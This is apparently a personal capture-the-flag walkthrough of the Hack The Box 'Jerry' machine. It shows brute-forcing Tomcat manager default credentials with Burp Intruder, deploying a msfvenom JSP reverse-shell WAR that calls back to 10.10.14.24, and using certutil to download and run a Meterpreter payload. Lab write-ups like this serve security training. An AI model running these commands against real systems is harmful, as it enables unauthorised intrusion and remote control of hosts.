HTB - 5. Jerry (Default Credentials)
-
nmap -T4 -p- -A 10.10.10.95shows 8080 open with Apache Tomcat/Coyote JSP engine 1.1 and Tomcat version 7.0.88 -
Go to
10.10.10.95and shwos Apache Tomcat default page -
Search
tomcat default credentialsand found https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown -
Burp Suite
- Click server management page
- Try login with
tomcat:tomcat - Send to decoder
- Select authorization basic and decode as base64
- Forwarded and did not work
- Try again and sent to repeater and intruder
-
Create passwords
- Get from the url and replace " " with ":".
- Write bash script to base64 encode all the credentials
for cred in $(cat tomcat.txt); do echo -n $cred | base64; done
-
Back to Burp Suite Intruder
- Set to sniper attack
- Select the authorization basic
- Paste in list of base64 encoded usernames and passwords into Payloads/Payload Options
- Disable URL encoder
- Run and see much longer length code 200 for the successful credientials:
tomcat:s3cret
-
Create WAR file exploit
- Search
tomcat war reverse shell msfvenom: https://netsec.ws/?p=331 msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f war > shell.warwhich will try to connect to our computer on port 4444nc -nvlp 4444to listen on port 4444- Upload to tomcat managment server and deploy
- Go to
/shelland gotnt authoirty/system
whoami cd c:\users\administrator cd Desktop cd flags dir arp -a - Search
-
New reverse shell Create payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=5555 -f exe > sh.exeListen on port 5555:
sudo msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp options set LHOST 10.10.14.24 set LPORT 5555 runTransfer file to windows:
python -m SimpleHTTPServer 80 <-- start server on attacker certutil -urlcache -f http://10.10.14.24/sh.exe c:\users\administrator\desktop\flags\sh.exe <-- On victim dir sh.exeResult: shell popped